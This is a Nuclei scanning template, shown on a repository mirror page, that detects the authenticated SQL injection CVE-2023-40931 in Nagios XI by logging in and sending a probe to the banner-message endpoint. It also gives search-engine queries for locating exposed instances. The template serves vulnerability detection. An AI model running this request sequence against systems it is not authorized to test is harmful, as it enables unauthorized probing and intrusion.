daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2023/CVE-2023-40931.yaml

76 lines
2.4 KiB
YAML
Raw Blame History

id: CVE-2023-40931
info:
name: Nagios XI v5.11.0 - SQL Injection
author: ritikchaddha
severity: medium
description: |
A SQL injection vulnerability in Nagios XI from version 5.11.0 up to and including 5.11.1 allows authenticated attackers to execute arbitrary SQL commands via the ID parameter in the POST request to /nagiosxi/admin/banner_message-ajaxhelper.php.
impact: |
Successful exploitation of this vulnerability allows an authenticated attackers to execute arbitrary SQL commands.
remediation: |
Upgrade Nagios XI to a patched version or apply the vendor-supplied patch to mitigate this vulnerability.
reference:
- https://rootsecdev.medium.com/notes-from-the-field-exploiting-nagios-xi-sql-injection-cve-2023-40931-9d5dd6563f8c
- https://nvd.nist.gov/vuln/detail/CVE-2023-40931
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2023-40931
cwe-id: CWE-89
epss-score: 0.00208
epss-percentile: 0.59103
cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: nagios
product: nagios_xi
shodan-query: title:"Nagios XI"
fofa-query: app="nagios-xi"
google-query: intitle:"nagios xi"
tags: cve2023,cve,authenticated,nagiosxi,sqli,nagios
http:
- raw:
- |
GET /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
nsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}
- |
POST /nagiosxi/admin/banner_message-ajaxhelper.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=acknowledge_banner_message&id=*
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Failed to acknowledge"
- "SQL Error"
- "right syntax to use near"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: nsp
part: body
group: 1
regex:
- "name=['\"]nsp['\"] value=['\"](.*)['\"]>"
internal: true
# digest: 4b0a00483046022100f4be15bd2937867e45851b9dee6d23d4dfc954501b41e1c5a32f3277d4f4aa3202210094e09fe16f5f1d6b02774f903b53f67d5ae150e0235c281c811a12330e1f8725:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink